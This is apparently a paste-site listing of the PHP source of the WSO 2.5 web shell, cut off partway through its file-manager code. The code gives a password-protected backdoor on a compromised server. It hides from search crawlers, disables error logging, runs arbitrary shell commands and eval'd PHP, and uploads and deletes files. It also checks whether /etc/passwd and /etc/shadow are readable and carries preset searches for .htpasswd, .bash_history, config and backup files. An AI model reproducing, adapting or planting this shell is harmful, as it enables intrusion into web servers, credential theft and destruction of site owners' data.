SHOW:
|
|
- or go back to the newest paste.
1 | <?php | |
2 | $auth_pass = "a57fc812a9521b8c0ede9a2724351a55"; | |
3 | $color = "#df5"; | |
4 | $default_action = 'FilesMan'; | |
5 | $default_use_ajax = true; | |
6 | $default_charset = 'Windows-1251'; | |
7 | ||
8 | if(!empty($_SERVER['HTTP_USER_AGENT'])) { | |
9 | $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"); | |
10 | if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) { | |
11 | header('HTTP/1.0 404 Not Found'); | |
12 | exit; | |
13 | } | |
14 | } | |
15 | ||
16 | @ini_set('error_log',NULL); | |
17 | @ini_set('log_errors',0); | |
18 | @ini_set('max_execution_time',0); | |
19 | @set_time_limit(0); | |
20 | @set_magic_quotes_runtime(0); | |
21 | @define('WSO_VERSION', '2.5'); | |
22 | ||
23 | if(get_magic_quotes_gpc()) { | |
24 | function WSOstripslashes($array) { | |
25 | return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array); | |
26 | } | |
27 | $_POST = WSOstripslashes($_POST); | |
28 | $_COOKIE = WSOstripslashes($_COOKIE); | |
29 | } | |
30 | ||
31 | function wsoLogin() { | |
32 | die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>"); | |
33 | } | |
34 | ||
35 | function WSOsetcookie($k, $v) { | |
36 | $_COOKIE[$k] = $v; | |
37 | setcookie($k, $v); | |
38 | } | |
39 | ||
40 | if(!empty($auth_pass)) { | |
41 | if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass)) | |
42 | WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass); | |
43 | ||
44 | if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass)) | |
45 | wsoLogin(); | |
46 | } | |
47 | ||
48 | if(strtolower(substr(PHP_OS,0,3)) == "win") | |
49 | $os = 'win'; | |
50 | else | |
51 | $os = 'nix'; | |
52 | ||
53 | $safe_mode = @ini_get('safe_mode'); | |
54 | if(!$safe_mode) | |
55 | error_reporting(0); | |
56 | ||
57 | $disable_functions = @ini_get('disable_functions'); | |
58 | $home_cwd = @getcwd(); | |
59 | if(isset($_POST['c'])) | |
60 | @chdir($_POST['c']); | |
61 | $cwd = @getcwd(); | |
62 | if($os == 'win') { | |
63 | $home_cwd = str_replace("\\", "/", $home_cwd); | |
64 | $cwd = str_replace("\\", "/", $cwd); | |
65 | } | |
66 | if($cwd[strlen($cwd)-1] != '/') | |
67 | $cwd .= '/'; | |
68 | ||
69 | if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) | |
70 | $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$default_use_ajax; | |
71 | ||
72 | if($os == 'win') | |
73 | $aliases = array( | |
74 | "List Directory" => "dir", | |
75 | "Find index.php in current dir" => "dir /s /w /b index.php", | |
76 | "Find *config*.php in current dir" => "dir /s /w /b *config*.php", | |
77 | "Show active connections" => "netstat -an", | |
78 | "Show running services" => "net start", | |
79 | "User accounts" => "net user", | |
80 | "Show computers" => "net view", | |
81 | "ARP Table" => "arp -a", | |
82 | "IP Configuration" => "ipconfig /all" | |
83 | ); | |
84 | else | |
85 | $aliases = array( | |
86 | "List dir" => "ls -lha", | |
87 | "list file attributes on a Linux second extended file system" => "lsattr -va", | |
88 | "show opened ports" => "netstat -an | grep -i listen", | |
89 | "process status" => "ps aux", | |
90 | "Find" => "", | |
91 | "find all suid files" => "find / -type f -perm -04000 -ls", | |
92 | "find suid files in current dir" => "find . -type f -perm -04000 -ls", | |
93 | "find all sgid files" => "find / -type f -perm -02000 -ls", | |
94 | "find sgid files in current dir" => "find . -type f -perm -02000 -ls", | |
95 | "find config.inc.php files" => "find / -type f -name config.inc.php", | |
96 | "find config* files" => "find / -type f -name \"config*\"", | |
97 | "find config* files in current dir" => "find . -type f -name \"config*\"", | |
98 | "find all writable folders and files" => "find / -perm -2 -ls", | |
99 | "find all writable folders and files in current dir" => "find . -perm -2 -ls", | |
100 | "find all service.pwd files" => "find / -type f -name service.pwd", | |
101 | "find service.pwd files in current dir" => "find . -type f -name service.pwd", | |
102 | "find all .htpasswd files" => "find / -type f -name .htpasswd", | |
103 | "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", | |
104 | "find all .bash_history files" => "find / -type f -name .bash_history", | |
105 | "find .bash_history files in current dir" => "find . -type f -name .bash_history", | |
106 | "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", | |
107 | "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", | |
108 | "Locate" => "", | |
109 | "locate httpd.conf files" => "locate httpd.conf", | |
110 | "locate vhosts.conf files" => "locate vhosts.conf", | |
111 | "locate proftpd.conf files" => "locate proftpd.conf", | |
112 | "locate psybnc.conf files" => "locate psybnc.conf", | |
113 | "locate my.conf files" => "locate my.conf", | |
114 | "locate admin.php files" =>"locate admin.php", | |
115 | "locate cfg.php files" => "locate cfg.php", | |
116 | "locate conf.php files" => "locate conf.php", | |
117 | "locate config.dat files" => "locate config.dat", | |
118 | "locate config.php files" => "locate config.php", | |
119 | "locate config.inc files" => "locate config.inc", | |
120 | "locate config.inc.php" => "locate config.inc.php", | |
121 | "locate config.default.php files" => "locate config.default.php", | |
122 | "locate config* files " => "locate config", | |
123 | "locate .conf files"=>"locate '.conf'", | |
124 | "locate .pwd files" => "locate '.pwd'", | |
125 | "locate .sql files" => "locate '.sql'", | |
126 | "locate .htpasswd files" => "locate '.htpasswd'", | |
127 | "locate .bash_history files" => "locate '.bash_history'", | |
128 | "locate .mysql_history files" => "locate '.mysql_history'", | |
129 | "locate .fetchmailrc files" => "locate '.fetchmailrc'", | |
130 | "locate backup files" => "locate backup", | |
131 | "locate dump files" => "locate dump", | |
132 | "locate priv files" => "locate priv" | |
133 | ); | |
134 | ||
135 | function wsoHeader() { | |
136 | if(empty($_POST['charset'])) | |
137 | $_POST['charset'] = $GLOBALS['default_charset']; | |
138 | global $color; | |
139 | echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - WSO " . WSO_VERSION ."</title> | |
140 | <style> | |
141 | body{background-color:#444;color:#e1e1e1;} | |
142 | body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } | |
143 | table.info{ color:#fff;background-color:#222; } | |
144 | span,h1,a{ color: $color !important; } | |
145 | span{ font-weight: bolder; } | |
146 | h1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } | |
147 | div.content{ padding: 5px;margin-left:5px;background-color:#333; } | |
148 | a{ text-decoration:none; } | |
149 | a:hover{ text-decoration:underline; } | |
150 | .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } | |
151 | .bigarea{ width:100%;height:300px; } | |
152 | input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,'Courier New'; } | |
153 | form{ margin:0px; } | |
154 | #toolsTbl{ text-align:center; } | |
155 | .toolsInp{ width: 300px } | |
156 | .main th{text-align:left;background-color:#5e5e5e;} | |
157 | .main tr:hover{background-color:#5e5e5e} | |
158 | .l1{background-color:#444} | |
159 | .l2{background-color:#333} | |
160 | pre{font-family:Courier,Monospace;} | |
161 | </style> | |
162 | <script> | |
163 | var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "'; | |
164 | var a_ = '" . htmlspecialchars(@$_POST['a']) ."' | |
165 | var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."'; | |
166 | var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."'; | |
167 | var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."'; | |
168 | var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."'; | |
169 | var d = document; | |
170 | function set(a,c,p1,p2,p3,charset) { | |
171 | if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; | |
172 | if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; | |
173 | if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; | |
174 | if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; | |
175 | if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; | |
176 | if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; | |
177 | } | |
178 | function g(a,c,p1,p2,p3,charset) { | |
179 | set(a,c,p1,p2,p3,charset); | |
180 | d.mf.submit(); | |
181 | } | |
182 | function a(a,c,p1,p2,p3,charset) { | |
183 | set(a,c,p1,p2,p3,charset); | |
184 | var params = 'ajax=true'; | |
185 | for(i=0;i<d.mf.elements.length;i++) | |
186 | params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); | |
187 | sr('" . addslashes($_SERVER['REQUEST_URI']) ."', params); | |
188 | } | |
189 | function sr(url, params) { | |
190 | if (window.XMLHttpRequest) | |
191 | req = new XMLHttpRequest(); | |
192 | else if (window.ActiveXObject) | |
193 | req = new ActiveXObject('Microsoft.XMLHTTP'); | |
194 | if (req) { | |
195 | req.onreadystatechange = processReqChange; | |
196 | req.open('POST', url, true); | |
197 | req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); | |
198 | req.send(params); | |
199 | } | |
200 | } | |
201 | function processReqChange() { | |
202 | if( (req.readyState == 4) ) | |
203 | if(req.status == 200) { | |
204 | var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm'); | |
205 | var arr=reg.exec(req.responseText); | |
206 | eval(arr[2].substr(0, arr[1])); | |
207 | } else alert('Request error!'); | |
208 | } | |
209 | </script> | |
210 | <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> | |
211 | <form method=post name=mf style='display:none;'> | |
212 | <input type=hidden name=a> | |
213 | <input type=hidden name=c> | |
214 | <input type=hidden name=p1> | |
215 | <input type=hidden name=p2> | |
216 | <input type=hidden name=p3> | |
217 | <input type=hidden name=charset> | |
218 | </form>"; | |
219 | $freeSpace = @diskfreespace($GLOBALS['cwd']); | |
220 | $totalSpace = @disk_total_space($GLOBALS['cwd']); | |
221 | $totalSpace = $totalSpace?$totalSpace:1; | |
222 | $release = @php_uname('r'); | |
223 | $kernel = @php_uname('s'); | |
224 | $explink = 'http://exploit-db.com/search/?action=search&filter_description='; | |
225 | if(strpos('Linux', $kernel) !== false) | |
226 | $explink .= urlencode('Linux Kernel ' . substr($release,0,6)); | |
227 | else | |
228 | $explink .= urlencode($kernel . ' ' . substr($release,0,3)); | |
229 | if(!function_exists('posix_getegid')) { | |
230 | $user = @get_current_user(); | |
231 | $uid = @getmyuid(); | |
232 | $gid = @getmygid(); | |
233 | $group = "?"; | |
234 | } else { | |
235 | $uid = @posix_getpwuid(posix_geteuid()); | |
236 | $gid = @posix_getgrgid(posix_getegid()); | |
237 | $user = $uid['name']; | |
238 | $uid = $uid['uid']; | |
239 | $group = $gid['name']; | |
240 | $gid = $gid['gid']; | |
241 | } | |
242 | ||
243 | $cwd_links = ''; | |
244 | $path = explode("/", $GLOBALS['cwd']); | |
245 | $n=count($path); | |
246 | for($i=0; $i<$n-1; $i++) { | |
247 | $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\""; | |
248 | for($j=0; $j<=$i; $j++) | |
249 | $cwd_links .= $path[$j].'/'; | |
250 | $cwd_links .= "\")'>".$path[$i]."/</a>"; | |
251 | } | |
252 | ||
253 | $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); | |
254 | $opt_charsets = ''; | |
255 | foreach($charsets as $item) | |
256 | $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>'; | |
257 | ||
258 | $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network'); | |
259 | if(!empty($GLOBALS['auth_pass'])) | |
260 | $m['Logout'] = 'Logout'; | |
261 | $m['Self remove'] = 'SelfRemove'; | |
262 | $menu = ''; | |
263 | foreach($m as $k => $v) | |
264 | $menu .= '<th width="'.(int)(100/count($m)).'%">[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>'; | |
265 | ||
266 | $drives = ""; | |
267 | if($GLOBALS['os'] == 'win') { | |
268 | foreach(range('c','z') as $drive) | |
269 | if(is_dir($drive.':\\')) | |
270 | $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> '; | |
271 | } | |
272 | echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win'?'<br>Drives:':'') . '</span></td>' | |
273 | . '<td><nobr>' . substr(@php_uname(), 0, 120) . ' <a href="' . $explink . '" target=_blank>[exploit-db.com]</a></nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=green><b>OFF</b></font>') | |
274 | . ' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . wsoViewSize($totalSpace) . ' <span>Free:</span> ' . wsoViewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)<br>' . $cwd_links . ' '. wsoPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>' | |
275 | . '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . @$_SERVER["SERVER_ADDR"] . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>' | |
276 | . '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div style="margin:5">'; | |
277 | } | |
278 | ||
279 | function wsoFooter() { | |
280 | $is_writable = is_writable($GLOBALS['cwd'])?" <font color='green'>(Writeable)</font>":" <font color=red>(Not writable)</font>"; | |
281 | echo " | |
282 | </div> | |
283 | <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> | |
284 | <tr> | |
285 | <td><form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'><input type=submit value='>>'></form></td> | |
286 | <td><form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> | |
287 | </tr><tr> | |
288 | <td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> | |
289 | <td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> | |
290 | </tr><tr> | |
291 | <td><form onsubmit=\"g('Console',null,this.c.value);return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> | |
292 | <td><form method='post' ENCTYPE='multipart/form-data'> | |
293 | <input type=hidden name=a value='FilesMAn'> | |
294 | <input type=hidden name=c value='" . $GLOBALS['cwd'] ."'> | |
295 | <input type=hidden name=p1 value='uploadFile'> | |
296 | <input type=hidden name=charset value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'> | |
297 | <span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> | |
298 | </tr></table></div></body></html>"; | |
299 | } | |
300 | ||
301 | if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) { | |
302 | function posix_getpwuid($p) {return false;} } | |
303 | if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) { | |
304 | function posix_getgrgid($p) {return false;} } | |
305 | ||
306 | function wsoEx($in) { | |
307 | $out = ''; | |
308 | if (function_exists('exec')) { | |
309 | @exec($in,$out); | |
310 | $out = @join("\n",$out); | |
311 | } elseif (function_exists('passthru')) { | |
312 | ob_start(); | |
313 | @passthru($in); | |
314 | $out = ob_get_clean(); | |
315 | } elseif (function_exists('system')) { | |
316 | ob_start(); | |
317 | @system($in); | |
318 | $out = ob_get_clean(); | |
319 | } elseif (function_exists('shell_exec')) { | |
320 | $out = shell_exec($in); | |
321 | } elseif (is_resource($f = @popen($in,"r"))) { | |
322 | $out = ""; | |
323 | while(!@feof($f)) | |
324 | $out .= fread($f,1024); | |
325 | pclose($f); | |
326 | } | |
327 | return $out; | |
328 | } | |
329 | wsoBaseTools(); | |
330 | function wsoViewSize($s) { | |
331 | if (is_int($s)) | |
332 | $s = sprintf("%u", $s); | |
333 | ||
334 | if($s >= 1073741824) | |
335 | return sprintf('%1.2f', $s / 1073741824 ). ' GB'; | |
336 | elseif($s >= 1048576) | |
337 | return sprintf('%1.2f', $s / 1048576 ) . ' MB'; | |
338 | elseif($s >= 1024) | |
339 | return sprintf('%1.2f', $s / 1024 ) . ' KB'; | |
340 | else | |
341 | return $s . ' B'; | |
342 | } | |
343 | ||
344 | function wsoPerms($p) { | |
345 | if (($p & 0xC000) == 0xC000)$i = 's'; | |
346 | elseif (($p & 0xA000) == 0xA000)$i = 'l'; | |
347 | elseif (($p & 0x8000) == 0x8000)$i = '-'; | |
348 | elseif (($p & 0x6000) == 0x6000)$i = 'b'; | |
349 | elseif (($p & 0x4000) == 0x4000)$i = 'd'; | |
350 | elseif (($p & 0x2000) == 0x2000)$i = 'c'; | |
351 | elseif (($p & 0x1000) == 0x1000)$i = 'p'; | |
352 | else $i = 'u'; | |
353 | $i .= (($p & 0x0100) ? 'r' : '-'); | |
354 | $i .= (($p & 0x0080) ? 'w' : '-'); | |
355 | $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); | |
356 | $i .= (($p & 0x0020) ? 'r' : '-'); | |
357 | $i .= (($p & 0x0010) ? 'w' : '-'); | |
358 | $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); | |
359 | $i .= (($p & 0x0004) ? 'r' : '-'); | |
360 | $i .= (($p & 0x0002) ? 'w' : '-'); | |
361 | $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); | |
362 | return $i; | |
363 | } | |
364 | ||
365 | function wsoPermsColor($f) { | |
366 | if (!@is_readable($f)) | |
367 | return '<font color=#FF0000>' . wsoPerms(@fileperms($f)) . '</font>'; | |
368 | elseif (!@is_writable($f)) | |
369 | return '<font color=white>' . wsoPerms(@fileperms($f)) . '</font>'; | |
370 | else | |
371 | return '<font color=#25ff00>' . wsoPerms(@fileperms($f)) . '</font>'; | |
372 | } | |
373 | ||
374 | function wsoScandir($dir) { | |
375 | if(function_exists("scandir")) { | |
376 | return scandir($dir); | |
377 | } else { | |
378 | $dh = opendir($dir); | |
379 | while (false !== ($filename = readdir($dh))) | |
380 | $files[] = $filename; | |
381 | return $files; | |
382 | } | |
383 | } | |
384 | ||
385 | function wsoWhich($p) { | |
386 | $path = wsoEx('which ' . $p); | |
387 | if(!empty($path)) | |
388 | return $path; | |
389 | return false; | |
390 | } | |
391 | ||
392 | function actionSecInfo() { | |
393 | wsoHeader(); | |
394 | echo '<h1>Server security information</h1><div class=content>'; | |
395 | function wsoSecParam($n, $v) { | |
396 | $v = trim($v); | |
397 | if($v) { | |
398 | echo '<span>' . $n . ': </span>'; | |
399 | if(strpos($v, "\n") === false) | |
400 | echo $v . '<br>'; | |
401 | else | |
402 | echo '<pre class=ml1>' . $v . '</pre>'; | |
403 | } | |
404 | } | |
405 | ||
406 | wsoSecParam('Server software', @getenv('SERVER_SOFTWARE')); | |
407 | if(function_exists('apache_get_modules')) | |
408 | wsoSecParam('Loaded Apache modules', implode(', ', apache_get_modules())); | |
409 | wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none'); | |
410 | wsoSecParam('Open base dir', @ini_get('open_basedir')); | |
411 | wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); | |
412 | wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); | |
413 | wsoSecParam('cURL support', function_exists('curl_version')?'enabled':'no'); | |
414 | $temp=array(); | |
415 | if(function_exists('mysql_get_client_info')) | |
416 | $temp[] = "MySql (".mysql_get_client_info().")"; | |
417 | if(function_exists('mssql_connect')) | |
418 | $temp[] = "MSSQL"; | |
419 | if(function_exists('pg_connect')) | |
420 | $temp[] = "PostgreSQL"; | |
421 | if(function_exists('oci_connect')) | |
422 | $temp[] = "Oracle"; | |
423 | wsoSecParam('Supported databases', implode(', ', $temp)); | |
424 | echo '<br>'; | |
425 | ||
426 | if($GLOBALS['os'] == 'nix') { | |
427 | wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no'); | |
428 | wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>":'no'); | |
429 | wsoSecParam('OS version', @file_get_contents('/proc/version')); | |
430 | wsoSecParam('Distr name', @file_get_contents('/etc/issue.net')); | |
431 | if(!$GLOBALS['safe_mode']) { | |
432 | $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); | |
433 | $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); | |
434 | $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); | |
435 | echo '<br>'; | |
436 | $temp=array(); | |
437 | foreach ($userful as $item) | |
438 | if(wsoWhich($item)) | |
439 | $temp[] = $item; | |
440 | wsoSecParam('Userful', implode(', ',$temp)); | |
441 | $temp=array(); | |
442 | foreach ($danger as $item) | |
443 | if(wsoWhich($item)) | |
444 | $temp[] = $item; | |
445 | wsoSecParam('Danger', implode(', ',$temp)); | |
446 | $temp=array(); | |
447 | foreach ($downloaders as $item) | |
448 | if(wsoWhich($item)) | |
449 | $temp[] = $item; | |
450 | wsoSecParam('Downloaders', implode(', ',$temp)); | |
451 | echo '<br/>'; | |
452 | wsoSecParam('HDD space', wsoEx('df -h')); | |
453 | wsoSecParam('Hosts', @file_get_contents('/etc/hosts')); | |
454 | echo '<br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>'; | |
455 | if (isset ($_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) && is_numeric($_POST['p3'])) { | |
456 | $temp = ""; | |
457 | for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) { | |
458 | $uid = @posix_getpwuid($_POST['p2']); | |
459 | if ($uid) | |
460 | $temp .= join(':',$uid)."\n"; | |
461 | } | |
462 | echo '<br/>'; | |
463 | wsoSecParam('Users', $temp); | |
464 | } | |
465 | } | |
466 | } else { | |
467 | wsoSecParam('OS Version',wsoEx('ver')); | |
468 | wsoSecParam('Account Settings',wsoEx('net accounts')); | |
469 | wsoSecParam('User Accounts',wsoEx('net user')); | |
470 | } | |
471 | echo '</div>'; | |
472 | wsoFooter(); | |
473 | } | |
474 | ||
475 | function actionPhp() { | |
476 | if(isset($_POST['ajax'])) { | |
477 | WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true); | |
478 | ob_start(); | |
479 | eval($_POST['p1']); | |
480 | $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\'\0") . "';\n"; | |
481 | echo strlen($temp), "\n", $temp; | |
482 | exit; | |
483 | } | |
484 | if(empty($_POST['ajax']) && !empty($_POST['p1'])) | |
485 | WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0); | |
486 | ||
487 | wsoHeader(); | |
488 | if(isset($_POST['p2']) && ($_POST['p2'] == 'info')) { | |
489 | echo '<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>'; | |
490 | ob_start(); | |
491 | phpinfo(); | |
492 | $tmp = ob_get_clean(); | |
493 | $tmp = preg_replace(array ( | |
494 | '!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU', | |
495 | '!td, th {(.*)}!msiU', | |
496 | '!<img[^>]+>!msiU', | |
497 | ), array ( | |
498 | '', | |
499 | '.e, .v, .h, .h th {$1}', | |
500 | '' | |
501 | ), $tmp); | |
502 | echo str_replace('<h1','<h2', $tmp) .'</div><br>'; | |
503 | } | |
504 | echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">'; | |
505 | echo ' <input type=checkbox name=ajax value=1 '.($_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>'; | |
506 | if(!empty($_POST['p1'])) { | |
507 | ob_start(); | |
508 | eval($_POST['p1']); | |
509 | echo htmlspecialchars(ob_get_clean()); | |
510 | } | |
511 | echo '</pre></div>'; | |
512 | wsoFooter(); | |
513 | } | |
514 | ||
515 | function actionFilesMan() { | |
516 | if (!empty ($_COOKIE['f'])) | |
517 | $_COOKIE['f'] = @unserialize($_COOKIE['f']); | |
518 | ||
519 | if(!empty($_POST['p1'])) { | |
520 | switch($_POST['p1']) { | |
521 | case 'uploadFile': | |
522 | if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) | |
523 | echo "Can't upload file!"; | |
524 | break; | |
525 | case 'mkdir': | |
526 | if(!@mkdir($_POST['p2'])) | |
527 | echo "Can't create new dir"; | |
528 | break; | |
529 | case 'delete': | |
530 | function deleteDir($path) { | |
531 | $path = (substr($path,-1)=='/') ? $path:$path.'/'; | |
532 | $dh = opendir($path); | |
533 | while ( ($item = readdir($dh) ) !== false) { | |
534 | $item = $path.$item; | |
535 | if ( (basename($item) == "..") || (basename($item) == ".") ) | |
536 | continue; | |
537 | $type = filetype($item); | |
538 | if ($type == "dir") | |
539 | deleteDir($item); | |
540 | else | |
541 | @unlink($item); | |
542 | } | |
543 | closedir($dh); | |
544 | @rmdir($path); | |
545 | } | |
546 | if(is_array(@$_POST['f'])) | |
547 | foreach($_POST['f'] as $f) { | |
548 | if($f == '..') | |
549 | continue; | |
550 | $f = urldecode($f); | |
551 | if(is_dir($f)) | |
552 | deleteDir($f); | |
553 | else | |
554 | @unlink($f); | |
555 | } | |
556 | break; | |
557 | case 'paste': | |
558 | if($_COOKIE['act'] == 'copy') { | |
559 | function copy_paste($c,$s,$d){ | |
560 | if(is_dir($c.$s)){ | |
561 | mkdir($d.$s); | |
562 | $h = @opendir($c.$s); | |
563 | while (($f = @readdir($h)) !== false) | |
564 | if (($f != ".") and ($f != "..")) | |
565 | copy_paste($c.$s.'/',$f, $d.$s.'/'); | |
566 | } elseif(is_file($c.$s)) | |
567 | @copy($c.$s, $d.$s); | |
568 | } | |
569 | foreach($_COOKIE['f'] as $f) | |
570 | copy_paste($_COOKIE['c'],$f, $GLOBALS['cwd']); | |
571 | } elseif($_COOKIE['act'] == 'move') { | |
572 | function move_paste($c,$s,$d){ | |
573 | if(is_dir($c.$s)){ | |
574 | mkdir($d.$s); | |
575 | $h = @opendir($c.$s); | |
576 | while (($f = @readdir($h)) !== false) | |
577 | if (($f != ".") and ($f != "..")) | |
578 | copy_paste($c.$s.'/',$f, $d.$s.'/'); | |
579 | } elseif(@is_file($c.$s)) | |
580 | @copy($c.$s, $d.$s); | |
581 | } | |
582 | foreach($_COOKIE['f'] as $f) | |
583 | @rename($_COOKIE['c'].$f, $GLOBALS['cwd'].$f); | |
584 | } elseif($_COOKIE['act'] == 'zip') { | |
585 | if(class_exists('ZipArchive')) { | |
586 | $zip = new ZipArchive(); | |
587 | if ($zip->open($_POST['p2'], 1)) { | |
